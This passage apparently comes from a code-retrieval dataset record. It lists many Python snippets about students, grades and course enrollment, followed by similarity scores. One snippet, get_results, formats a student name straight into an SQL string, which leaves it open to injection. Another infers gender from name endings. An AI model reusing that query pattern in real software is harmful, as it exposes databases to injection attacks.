800']], ['11658', 'Kelly, P', 'SYEN', ['SSW 540']], ['11714', 'Morton, A', 'SYEN', ['SYS 611', 'SYS 645']], ['11788', 'Fuller, E', 'SYEN', ['SSW 540']]]\n computed_results: List[str] = list()\n\n for record in SIT.all_students.values():\n computed_results.append(record.fetch_student_records())\n\n self.assertEqual(expected_result, computed_results)", "def Students_in_class(l:list,d:str,c:str)->list:\n result=[]\n for s in l:\n if Student_is_enrolled(s,d,c):\n result.append(s)\n return result", "def generate_students(G, school_type,N_classes,class_size,p_children,p_parents):\n\tage_bracket = get_age_bracket(school_type)\n\t# mapping of classes to ages\n\tage_bracket_map = get_age_distribution(school_type, N_classes)\n\n\t# number of students of every age group required to fill 
all classes of \n\t# the school\n\tN_target_students = {age:0 for age in age_bracket_map.values()}\n\tfor age in age_bracket_map.values():\n\t\tN_target_students[age] += class_size \n\n\tN_current_students = {i:0 for i in age_bracket}\n\tstudent_counter = 1\n\tfamily_counter = 1\n\tfamily_member_counter = 1\n\n\t# generate students and their families until the school is full\n\twhile (np.asarray([N_target_students[age] for age in age_bracket]) - \\\n\t\tnp.asarray([N_current_students[age] for age in age_bracket])).sum() > 0:\n\n\n\t\tages, N_parents = generate_student_family(school_type, p_children,\n\t\t\t\t\t\t\t\t\t\t\t\t p_parents)\n\n\t\t# Keep the family if at least one of the children fits into the school. \n\t\t# Else the family has to be discarded and a new one created.\n\t\tfits_in_school = []\n\t\tdoesnt_fit = []\n\t\tstudent_nodes = []\n\t\tfamily_nodes = []\n\t\tfor age in ages:\n\t\t\t# there is room for a student with the given age in the school ->\n\t\t\t# add the node to the graph as student\n\t\t\tif age in age_bracket and \\\n\t\t\t N_current_students[age] < N_target_students[age]:\n\n\t\t\t\t# Note: student IDs are created here with a big \"S\" at first.\n\t\t\t\t# Later on (in the function assign_classes()), students will\n\t\t\t\t# be assigned to classes and student node IDs relabelled with\n\t\t\t\t# the final small \"s\" such that s1 is the first student of the\n\t\t\t\t# first class and sN is the last student in the last class.\n\t\t\t\tstudent_ID = 'S{:04d}'.format(student_counter)\n\t\t\t\tG.add_node(student_ID)\n\t\t\t\tnx.set_node_attributes(G, \\\n\t\t\t\t\t\t{student_ID:{'type':'student',\n\t\t\t\t\t\t\t\t\t 'age':age,\n\t\t\t\t\t\t\t\t\t 'family':family_counter}})\n\t\t\t\tstudent_counter += 1\n\t\t\t\tfits_in_school.append(age)\n\t\t\t\tstudent_nodes.append(student_ID)\n\t\t\t\tN_current_students[age] += 1\n\t\t\telse:\n\t\t\t\tdoesnt_fit.append(age)\n\n\t\t# at least one of the children did fit into the school:\n\t\tif len(fits_in_school) > 0:\n\t\t\t# add the students that didn't fit into the school as family members\n\t\t\tfor age in doesnt_fit:\n\t\t\t\tfamily_member_ID = 'f{:04d}'.format(family_member_counter)\n\t\t\t\tG.add_node(family_member_ID)\n\t\t\t\tnx.set_node_attributes(G, \\\n\t\t\t\t\t\t{family_member_ID:{'type':'family_member',\n\t\t\t\t\t\t\t\t\t\t 'age':age,\n\t\t\t\t\t\t\t\t\t\t 'family':family_counter,\n\t\t\t\t\t\t\t\t\t\t 'unit':'family'}})\n\t\t\t\tfamily_nodes.append(family_member_ID)\n\t\t\t\tfamily_member_counter += 1\n\n\t\t\t# parents\n\t\t\tfor parent in range(N_parents):\n\t\t\t\tfamily_member_ID = 'f{:04d}'.format(family_member_counter)\n\t\t\t\tG.add_node(family_member_ID)\n\t\t\t\tnx.set_node_attributes(G, \\\n\t\t\t\t\t\t{family_member_ID:{'type':'family_member',\n\t\t\t\t\t\t\t\t\t\t\t# Note: 20.5 is the age at which\n\t\t\t\t\t\t\t\t\t\t\t# the symptom and transmission risk\n\t\t\t\t\t\t\t\t\t\t\t# is that of an adult\n\t\t\t\t\t\t\t\t\t\t 'age':20.5,\n\t\t\t\t\t\t\t\t\t\t 'family':family_counter,\n\t\t\t\t\t\t\t\t\t\t 'unit':'family'}})\n\t\t\t\tfamily_member_counter += 1\n\t\t\t\tfamily_nodes.append(family_member_ID)\n\n\t\t\t# increase the family counter by one\n\t\t\tfamily_counter += 1\n\n\treturn family_member_counter, family_counter", "def all_instructors(self):\n \n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Instructor(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.first_name,\n i.Last_name,\n 
i.slack_handle,\n i.cohort_id,\n c.name\n from instructors i\n join cohorts c on i.cohort_id = c.id\n order by i.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Instructors***')\n\n for student in all_students:\n print(student)", "def func_Q1(db):\n grades_collection = db.grades\n student_list = list(grades_collection.distinct(\"student_id\", {}))\n\n return len(student_list)", "def get_all_grades(first_name, last_name):\n QUERY = \"\"\" SELECT s.first_name, s.last_name, g.project_title, g.grade \n FROM Students AS s \n INNER JOIN Grades AS g ON s.github = g.student_github\n WHERE s.first_name = ? AND s.last_name = ? \"\"\"\n db_cursor.execute(QUERY, (first_name, last_name))\n grades_data = db_cursor.fetchone()\n print grades_data[-1]", "def get_normalized_grades(cls):\n\n for grades in Students.students:\n normalized = []\n for course in cls.analized:\n try:\n normalized.append(\n (grades[course.index] - course.avg) / course.range\n )\n except:\n normalized.append(0)\n\n cls.grades_normalized.append(normalized)\n cls.Y.append(HOUSES.index(grades[1]))\n cls.m += 1", "def _create_students(self, num_students):\r\n return [self.create_student('robot%d' % i) for i in xrange(num_students)]", "def add_students() -> None:\r\n faculties = [\"Computer Science\", \"Performing Arts\", \"Engineering\", \"Economics\"]\r\n for faculty in faculties:\r\n for _ in range(50):\r\n create_student(faculty)", "def _create_students_with_state(self, num_students, state=None, grade=0, max_grade=1):\r\n self.define_option_problem(PROBLEM_URL_NAME)\r\n students = [\r\n UserFactory.create(username='robot%d' % i, email='robot+test+%d@edx.org' % i)\r\n for i in xrange(num_students)\r\n ]\r\n for student in students:\r\n CourseEnrollmentFactory.create(course_id=self.course.id, user=student)\r\n StudentModuleFactory.create(course_id=self.course.id,\r\n module_state_key=self.location,\r\n student=student,\r\n grade=grade,\r\n max_grade=max_grade,\r\n state=state)\r\n return students", "def find_delinquent_students(df):\n\n # TODO : Setup to print results with students name and email so an email\n # can quickly be sent to all students.\n\n def is_int(s):\n try:\n int(s)\n return True\n except ValueError:\n return False\n\n delinquent_students = []\n\n for name, group in df.groupby('Team ID'):\n na_cols = group.columns[group.isna().any()].tolist()\n num_members = len(group)\n delinquent_rater_nums = set([int(name.strip()[-1]) for name in na_cols\n if is_int(name.strip()[-1])])\n delinquent_students += [\n group['Student Name'][group['Rater #'] == num].values[0]\n for num in delinquent_rater_nums if num <= num_members]\n\n return delinquent_students", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n rows = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n rows=rows)\n # return html", "def select_all_students(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM student\")\n\n rows = cur.fetchall()\n\n return rows # return the rows", "def get_grade_entries(user, assignments_map, students_map):\n grade_entries = GradeEntry.query(ancestor=get_parent_key(user)).fetch()\n for grade_entry in grade_entries:\n grade_entry.assignment = assignments_map[grade_entry.assignment_key]\n grade_entry.student = students_map[grade_entry.student_key]\n return grade_entries", "def search_student_view(request):\n try:\n students = 
Student.objects.annotate(full_name=Concat('first_name', V(' '), 'last_name')).filter(Q(first_name__icontains=request.GET.get('q', ''))|\n Q(last_name__icontains=request.GET.get('q', ''))|\n Q(full_name__icontains=request.GET.get('q', '')),\n parent__user__centre=request.user.centre\n ).order_by('last_name')\n except:\n students = Student.objects.filter(parent__user__centre=request.user.centre).order_by('last_name')\n return render(request, 'students.html', {'students': students})", "def get_students(self):\n return u', '.join([c.student.username for c in self.candidates.all()])", "def all_instructors(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Instructor(\n row[1], row[2], row[6], row[6], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select i.Id,\n i.FirstName,\n i.LastName,\n i.SlackHandle,\n i.CohortId,\n i.Specialty,\n c.Name\n from Instructor i\n join Cohort c on i.CohortId = c.Id\n order by i.CohortId\n \"\"\")\n\n all_instructors = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for instructor in all_instructors:\n print(instructor)", "def get_school_name_urls():\n\tschools_tree = get_tree(\"http://www.gla.ac.uk/schools/\")\n\tns = 'http://exslt.org/regular-expressions'\n\tpath = '//div[@class=\"row standardContent\"]//a[re:match(@href, \"schools/[A-Za-z]+/\")]'\n\t# Get all the <a> elements on the page which link to a school page\n\ta_elems = schools_tree.xpath(path, namespaces={'re':ns})\n\tbase_url = \"http://www.gla.ac.uk\"\n\turls = []\n\tnames = []\n\n\tfor a in a_elems:\n\t\t# make school staff page url\n\t\tstaff_page_url = base_url + a.get(\"href\") + \"staff/\"\n\t\turls.append(staff_page_url)\n\t\t# get name of school\n\t\tschool_name = a.text\n\t\tnames.append(school_name)\n\n\t# create list of tuples\n\tschool_names_urls = zip(names, urls)\n\treturn school_names_urls", "def get_eval_list(assessment, current_user):\n for team in Team.objects.all():\n if current_user in team.student.all() and team.course == assessment.course: # get the team\n evaluated_list = [student for student in team.student.all() if student != current_user]\n return evaluated_list", "def get_all_by_gender(students, gender):\n if gender == \"female\":\n gender_list = [student for student in students if student[1].endswith(\"a\")]\n return gender_list\n elif gender == \"male\":\n male_list = []\n for counter, student in enumerate(students):\n if student[1].endswith(\"a\"):\n pass\n else: \n male_list.append(students[counter])\n return male_list\n\n else:\n raise ValueError('Wrong gender')", "def get_student_grade(class_id):\n grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? 
AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n # a list of (project_title, grade) for a given student\n titles_grades = hackbright.get_grades_by_github(github)\n\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n titles_grades=titles_grades)\n\n return html", "def pickallstudents():\n studlen = len(students)\n choicenum = 1\n while choicenum < (studlen + 1):\n pick = random.choice(students)\n students.remove(pick)\n pickedstudents.append(pick)\n print(f'#{choicenum} {pick}')\n choicenum = choicenum + 1", "def getGrades(self, student):\n try:\n return self.grades[student.getIDNumber()][:]\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def searchByYear(database):\n year=int(input(\"What is his year of study :\"))\n usrs,find=getByYear(database,year)\n for usr in usrs:\n print(usr)", "def filter_courses(original_courses_list, year, upper_bound, lower_bound, semester):\n filtered_courses_list = []\n\n for course in original_courses_list:\n if year is not None and course.year != year:\n continue\n if upper_bound is not None and course.grade > upper_bound:\n continue\n if lower_bound is not None and course.grade < lower_bound:\n continue\n if semester is not None and course.semester != semester:\n continue\n filtered_courses_list.append(course)\n\n return filtered_courses_list", "def __ui_search_student_by_id(self, search):\n try:\n result = self.__student_controller.search_by_id(search)\n for student in result:\n print(str(student))\n\n except RepositoryException as re:\n print(re)\n return", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n project_list = hackbright.get_grades_by_github(github)\n\n\n return render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n project_list=project_list)", "def get_student_classes():\n class_data = query_db(\n \"SELECT classes.id, classes.name FROM classes JOIN roster \"\n \"ON roster.class_id = classes.id where people_id=?;\",\n [flask.session[\"id\"]],\n )\n classes = []\n for class_info in class_data:\n student_class = {}\n student_class[\"id\"] = class_info[0]\n student_class[\"name\"] = class_info[1]\n classes.append(student_class)\n return classes", "def get_and_clean_student_list(students):\r\n\r\n students = split_by_comma_and_whitespace(students)\r\n students = [unicode(s.strip()) for s in students]\r\n students = [s for s in students if s != '']\r\n students_lc = [x.lower() for x in students]\r\n\r\n return students, students_lc", "def getGrades(self, student):\n try: 
#return copy of list of student's grades\"\"\"\n return self.grades[student.getIdNum()][:]\n except:\n raise ValueError('Student not in mapping')", "def students_data():\n\n return [\n {'name': 'Alexey', 'rate': 2, 'course': 'Python'},\n {'name': 'Vali', 'rate': 5, 'course': 'Java'},\n {'name': 'Olga', 'rate': 4, 'course': 'Python'},\n {'name': 'Frank', 'rate': 5, 'course': 'Python'},\n {'name': 'Masha', 'rate': 3, 'course': 'Java'},\n {'name': 'Vasily', 'rate': 2, 'course': 'Java'},\n {'name': 'Daria', 'rate': 3, 'course': 'Python'},\n {'name': 'Nickname', 'rate': 4, 'course': 'Python'},\n {'name': 'Fort', 'rate': 3, 'course': 'Java'},\n {'name': 'Lama', 'rate': 4, 'course': 'Java'},\n {'name': 'Pop', 'rate': 2, 'course': 'Python'},\n {'name': 'Sort', 'rate': 3, 'course': 'Python'},\n {'name': 'Elya', 'rate': 5, 'course': 'Java'},\n {'name': 'Tolik', 'rate': 4, 'course': 'Python'},\n ]", "def browse_students(request):\n students = Student.objects.filter(current_mentor=None)\\\n .exclude(Q(status='drop-out') | Q(status='unresponsive') | Q(status='retainer')\n | Q(status='alum') | Q(status='paused'))\n return render(request, 'match/browse_students.html', {'students': students})", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n title_grade_list = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n title_grade_list=title_grade_list)\n\n return html", "def Students_in_majors(l:list,i:list)->list:\n result=[]\n for s in l:\n if s.major in i:\n result.append(s)\n return result", "def delete_all_students(connection):\r\n with connection:\r\n return connection.execute(DELETE_ALL_STUDENTS)", "def get_results(self, stud_name):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\n \"SELECT c.naam, e.cijfer, e.ex_datum \"\n \"FROM studenten s \"\n \"INNER JOIN examens e ON e.stud_id = s.stud_id \"\n \"INNER JOIN cursussen c ON c.cur_id = e.cur_id WHERE s.naam = '{0}' \"\n \"ORDER BY e.ex_datum DESC\".format(stud_name))\n self.cur.close()\n\n return self.cur.fetchall()", "def student_pins_in_semester(cls, student: Student, semester: Semester) -> Iterable[Group]:\n pins = cls.objects.filter(\n group__course__semester_id=semester.pk, student_id=student.pk).select_related(\n 'group__course', 'group__teacher', 'group__teacher__user')\n return map(lambda p: p.group, pins)", "def test_get_students_for_contact(self):\n pass", "def set_of_courses(students_list: list) -> set:\n return set(student['course'] for student in students_list)", "def list(self, request):\n queryset = Students.objects.filter(average_rating=5.0)\n students = normalize_students(queryset)\n return Response(students)", "def make_students_list():\n students_data_list = generate_list_from_txt(\"students.txt\")\n students_list = extract_first_element(students_data_list)\n return students_list", "def get_student():\n\n github = request.args.get('github')\n\n first, last, github = hackbright.get_student_by_github(github)\n\n grades = hackbright.get_grades_by_github(github)\n\n html = render_template(\"student_info.html\",\n first=first,\n last=last,\n github=github,\n grades=grades)\n\n return html", "def top_students(grade_book, num_students=3):\n return sorted(grade_book, key=grade_book.get, reverse=True)[:num_students]", "def 
__ui_list_students(self):\n try:\n print(str(self.__student_controller))\n except RepositoryException as re:\n print(re)\n return", "def test_no_other_school_years(self):\n user = self.make_user()\n SchoolYearFactory()\n\n with self.login(user):\n self.get_check_200(\"reports:index\")\n\n assert list(self.get_context(\"school_years\")) == []", "def search_student(student):\n result=[]\n for name,age in alumnos.items():\n if student.lower() in name.lower():\n result.append(name)\n\n print(f\"Result {result}\")\n return result", "def get_all_allowed_enrollments(self):\n if self.is_superuser:\n return Enrollment.objects.all()\n\n # Enrollments belonging to students the user manages\n manages = Q(student__case_manager=self)\n # Enrollments belonging to sections the user teaches\n teaches = Q(section__teacher=self)\n\n # Filter all terms which the user teaches a class\n taught_terms = Term.objects.filter(section__teacher=self)\n\n # The teacher of another section in the same term in which the student is enrolled\n other_teacher = Q(pk__in=[])\n for term in taught_terms:\n overlapping_terms = term.get_overlapping_terms()\n # Get all sections from this term or its overlaps\n term_sections = Section.objects.filter(term__in=overlapping_terms)\n # Get all the enrollments in any section from this term\n term_enrollments = Enrollment.objects.filter(section__in=term_sections)\n # Get all the students taught by this user this term\n term_taught_students = Student.objects.filter(enrollment__in=term_enrollments.filter(section__teacher=self))\n # Get all the enrollments of those students for this term\n other_teacher = other_teacher | Q(student__in=term_taught_students, section__term__in=overlapping_terms)\n return Enrollment.objects.filter(teaches | manages | other_teacher).distinct()", "def get_grade(self, student_id):\r\n row = self.grades.get(student_id, [])\r\n ncomp = len(self.components)\r\n return [row.get(comp, None) for comp in range(ncomp)]", "def gr_s(gr):\r\n c.execute(\"SELECT * FROM personnel WHERE grade=:grade COLLATE NOCASE\", {'grade': gr})\r\n return c.fetchall()" ]
[ "0.76901233", "0.66902846", "0.65749806", "0.6472811", "0.64696026", "0.64033043", "0.63738966", "0.6277681", "0.62386876", "0.6223855", "0.6206561", "0.6142386", "0.61358625", "0.6032616", "0.6021176", "0.6009096", "0.5954611", "0.59262055", "0.59205323", "0.58794457", "0.58733386", "0.5850076", "0.57891273", "0.57453907", "0.57231045", "0.5717755", "0.57169706", "0.57159585", "0.5649871", "0.5633285", "0.561114", "0.56032526", "0.55238307", "0.5520008", "0.5511149", "0.5464064", "0.54371864", "0.5431545", "0.5412006", "0.53792197", "0.536918", "0.5342742", "0.5340107", "0.53318447", "0.5312373", "0.53081167", "0.5293116", "0.52666014", "0.526523", "0.5258975", "0.52423793", "0.5231378", "0.5228281", "0.522269", "0.52111393", "0.52102685", "0.5203732", "0.5199187", "0.5191569", "0.5182839", "0.5166292", "0.51654196", "0.51594615", "0.5155998", "0.51502407", "0.514863", "0.51410687", "0.5131697", "0.5131627", "0.511872", "0.5117872", "0.509651", "0.5095825", "0.508961", "0.50893444", "0.50847656", "0.5082722", "0.5080713", "0.5075901", "0.5064273", "0.5054334", "0.50492513", "0.5016618", "0.50047064", "0.50043213", "0.4989964", "0.49802378", "0.49611363", "0.49557397", "0.49510467", "0.49482134", "0.49456936", "0.49277157", "0.49248356", "0.49217528", "0.49194202", "0.49188057", "0.4912249", "0.4903743", "0.48954493" ]
0.5828101
22
Find all students in a particular grade.
def grade(self, grade_number: int):
    return self.students.setdefault(grade_number, [])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def students(self):\n\t\treturn self.grade_set.all().distinct()", "def find_students(self):\n from quizzer.models.attendance import Attendance\n from quizzer.models.semester import Semester\n\n semester = Semester.get_current()\n\n for attendance in Attendance.objects: # TODO: Use indexed query later.\n if attendance.semester == semester and attendance.class_ == self:\n yield attendance.student", "def __ui_list_grades_by_student(self):\n student_id = input(\"Give student ID: \")\n try:\n list_of_grades = self.__grade_controller.get_grades_by_student(student_id)\n if len(list_of_grades) == 0:\n print(\"Student doesn't have any grade.\")\n return\n\n for g in list_of_grades:\n print(str(g))\n\n except GradeException as ge:\n print(ge)\n return", "def all_students(self):\n \n with sqlite3.connect(self.db_path) as conn:\n # conn.row_factory = self.create_student\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n \n \n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n # for student in all_students:\n # print(f'{student[1]} {student[2]} is in {student[5]}')\n\n for student in all_students:\n print(student)", "def get_list_of_students(self):\n return self._students", "def get_all_failing_students(self):\n students = MyCollection()\n for student in self.__student_repository.get_all():\n failing = False\n for grade in self.__grade_repository.get_all():\n if \".\" + str(student.entity_id) in grade.entity_id and grade.grade_value < 5:\n failing = True\n if failing:\n students.append(student)\n return students", "def get_grades(self, student):\n try:\n return self.grades[student.id][:] # notice that a copy is returned\n except KeyError:\n raise ValueError('Student not in Grade Book.')", "def get_students(self) -> List['Student']:\n return self.students.values()", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.StudentId,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.CohortId\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n for student in all_students:\n print(student)", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(\n row[1], row[2], row[3], row[5]\n )\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.FirstName,\n s.LastName,\n s.SlackHandle,\n s.CohortId,\n c.Name\n from Student s\n join Cohort c on s.CohortId = c.Id\n order by s.CohortId\n \"\"\")\n\n all_students = db_cursor.fetchall()\n\n for student in all_students:\n print(student)", "def query_all():\n\tstudents = session.query(Student).all()\n\treturn students", "def get_all_by_student(self, stud_id):\n l = []\n for item in self._items:\n if item.get_student() == stud_id:\n l.append(item)\n return l[:]", "def get_students(self):\n self.cur = self.conn.cursor(pymysql.cursors.DictCursor)\n self.cur.execute(\"SELECT * FROM studenten\")\n self.cur.close()\n\n return self.cur.fetchall()", "def get_student_grade(class_id):\n 
grades = []\n quiz_grade = query_db(\n \"SELECT quizzes.name, grade FROM quiz_grades JOIN quizzes \"\n \"ON quiz_grades.quiz_id=quizzes.id JOIN topics \"\n \"ON quizzes.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id \"\n \"WHERE student_id=? AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in quiz_grade:\n student_grade_quiz = {}\n student_grade_quiz[\"thing_name\"] = grade[0]\n student_grade_quiz[\"grade\"] = grade[1]\n grades.append(student_grade_quiz)\n assignment_grade = query_db(\n \"SELECT assignments.name, grade FROM assignment_grades \"\n \"JOIN assignments ON assignment_grades.assignment_id=assignments.id \"\n \"JOIN topics on assignments.topic_id=topics.id JOIN classes \"\n \"ON topics.class_id=classes.id WHERE student_id=? \"\n \"AND topics.class_id=?;\",\n [flask.session[\"id\"], class_id],\n )\n for grade in assignment_grade:\n student_grade_assignment = {}\n student_grade_assignment[\"thing_name\"] = grade[0]\n student_grade_assignment[\"grade\"] = grade[1]\n grades.append(student_grade_assignment)\n return grades", "def all_students(self):\n\n with sqlite3.connect(self.db_path) as conn:\n conn.row_factory = lambda cursor, row: Student(row [1], row[2], row[3], row[5])\n\n db_cursor = conn.cursor()\n\n db_cursor.execute(\"\"\"\n select s.Id,\n s.first_name,\n s.Last_name,\n s.slack_handle,\n s.cohort_id,\n c.name\n from students s\n join cohorts c on s.cohort_id = c.id\n order by s.cohort_id\n \"\"\")\n\n all_students = db_cursor.fetchall()\n print('\\n***All Students***')\n\n for student in all_students:\n print(student)", "def main():\n given_scores = []\n num_grades = int(raw_input())\n for i in xrange(num_grades):\n given_scores.append(int(raw_input()))\n for score in grading_students(given_scores):\n print score", "def add_student(self, name: str, grade: int) -> None:\n school_grade = self.students.setdefault(grade, [])\n school_grade.append(name)\n school_grade.sort()", "def get_all_allowed_students(self):\n if self.is_superuser:\n return Student.objects.all()\n\n # Students who this user manages\n manages = Q(case_manager=self)\n # Students in a class this user teaches\n teaches = Q(enrollment__section__teacher=self)\n\n valid_students = Student.objects.filter(teaches | manages)\n return valid_students", "def getGrades(self,student):\n try:\n return self.grades[student.getIdNum()][:]\n except KeyError:\n raise ValueError('Student not in grade book')", "def get_grade_by_student(first_name):\n\n QUERY = \"\"\"\n SELECT g.project_title, g.grade \n FROM Students AS s JOIN Grades AS g \n ON s.github = g.student_github\n WHERE s.first_name = ?\n \"\"\"\n\n db_cursor.execute(QUERY, (first_name,))\n row = db_cursor.fetchall()\n \n if row != []:\n for project in row:\n print 'Grade for %s: %s' %(project[0], project[1])\n else:\n print 'Please try again and enter a FIRST NAME'", "def student_grades(student, course):\n cg = CourseGradeFactory().create(student, course)\n return cg.summary", "def get_grade(self, student_id):\r\n row = self.grades.get(student_id, [])\r\n ncomp = len(self.components)\r\n return [row.get(comp, None) for comp in range(ncomp)]", "def get_grade_entries(user, assignments_map, students_map):\n grade_entries = GradeEntry.query(ancestor=get_parent_key(user)).fetch()\n for grade_entry in grade_entries:\n grade_entry.assignment = assignments_map[grade_entry.assignment_key]\n grade_entry.student = students_map[grade_entry.student_key]\n return grade_entries", "def get_campus_students(session, school):\n # 
Parameter to avoid getting staff users\n parameters = {'filter[staff?]': False}\n users = get_all_pages(session, f'/campus/{school}/users', 100, params=parameters)\n ids = []\n\n for user in users:\n # Check that the user is not anonymized by checking first letters of login\n if not user['login'].startswith('3b3-'):\n ids.append(user['id'])\n\n return ids", "async def get_grades(\n self, last_sync: datetime = None, deleted=False, **kwargs\n ) -> Union[AsyncIterator[Grade], List[int]]:\n return Grade.get(self._api, last_sync, deleted, **kwargs)", "def allStudents(self):\n if not self.isSorted:\n self.students.sort()\n self.isSorted=True\n #return copy of list of students\n for s in self.students:\n yield s", "def select_all_from_students_db(connection):\r\n with connection:\r\n r = connection.execute(GET_ALL_STUDENTS)\r\n return r.fetchall()", "def getGrades(self, student):\n try:\n return self.grades[student.getIDNumber()][:]\n except KeyError:\n raise ValueError(\"Student not in Gradebook\")", "def getGrades(self, student):\n try: #return copy of list of student's grades\"\"\"\n return self.grades[student.getIdNum()][:]\n except:\n raise ValueError('Student not in mapping')", "def see_course_students(self, username: str, token: str, course_abbreviation: str) -> List[Tuple[str, float]]:\n\n # Validate user first\n if not self.validate(username=username, token=token, check_privilege='instructor'):\n raise RuntimeError(\"User not verified!\")\n\n # Get a DB cursor\n cursor = self._db_connection.cursor()\n\n # Get the course ID from the abbreviation\n cursor.execute('''\n SELECT course_id FROM courses WHERE course_abbreviation LIKE ?;\n ''', (course_abbreviation,))\n db_result = cursor.fetchone()\n\n # If no associated courses are found\n if db_result is None:\n RuntimeError(f\"Could not find course associated with: {course_abbreviation}\")\n\n # Extract the course ID from the returned tuple\n course_id = db_result[0]\n\n # Query database for all courses\n cursor.execute(\n '''\n SELECT \n uid,\n grade\n FROM \n enrollment_records\n WHERE\n course_id = ?\n ;\n ''', (course_id,))\n db_results = cursor.fetchall()\n\n # If no courses are available\n if db_results is None or len(db_results) == 0:\n return []\n\n # Build information dicts for every student enrolled in this course\n students = []\n for result in db_results:\n # Get the student's username (we don't want to be giving UIDs)\n student_name = self.get_username(result[0])\n\n # Build a course dict from the data\n students.append({\n \"name\": student_name,\n \"grade\": float(result[1])\n })\n\n # Return list of student info dictionaries\n return students", "def get_student(self, **fields):\n existing_fields = [i.name for i in self._db.get_columns('students')]\n student_fields = {}\n for key, value in fields.items():\n if key in existing_fields:\n student_fields[key] = value\n additional_fields = ['parent_UID', 'parent_key'] # Additional fields that could be passed in args\n parent_fields = {}\n group_key = None\n for key, value in fields.items():\n if key == 'group_key':\n group_key = value\n if key in additional_fields:\n if key == 'parent_UID':\n parent_fields['UID'] = value\n else:\n parent_fields[key] = value\n parent = None if len(parent_fields) == 0 else Parents.get_or_none(**parent_fields)\n query = Students.select().filter(**student_fields)\n if group_key is not None:\n query = query.join(StudentsGroups).join(Groups).where(Groups.group_key == group_key)\n if parent is not None:\n query = query.where(Students.parent == parent)\n 
students = [i for i in query]\n # Expect single value if search by unique fields, list if by non-unique or by parent\n return students if len(students) > 1 else students[0] if len(students) == 1 else None", "def get_all_by_gender(students, gender):\n if gender == \"female\":\n gender_list = [student for student in students if student[1].endswith(\"a\")]\n return gender_list\n elif gender == \"male\":\n male_list = []\n for counter, student in enumerate(students):\n if student[1].endswith(\"a\"):\n pass\n else: \n male_list.append(students[counter])\n return male_list\n\n else:\n raise ValueError('Wrong gender')", "def get_students_of_class(students, class_name):\n for row in students:\n class_list = [row for row in students if row[4]== class_name]\n return class_list", "def get_students(\n self,\n gradebook_id='',\n simple=False,\n section_name='',\n include_photo=False,\n include_grade_info=False,\n include_grade_history=False,\n include_makeup_grades=False\n ):\n # These are parameters required for the remote API call, so\n # there aren't too many arguments, or too many variables\n # pylint: disable=too-many-arguments,too-many-locals\n\n # Set params by arguments\n params = dict(\n includePhoto=json.dumps(include_photo),\n includeGradeInfo=json.dumps(include_grade_info),\n includeGradeHistory=json.dumps(include_grade_history),\n includeMakeupGrades=json.dumps(include_makeup_grades),\n )\n\n url = 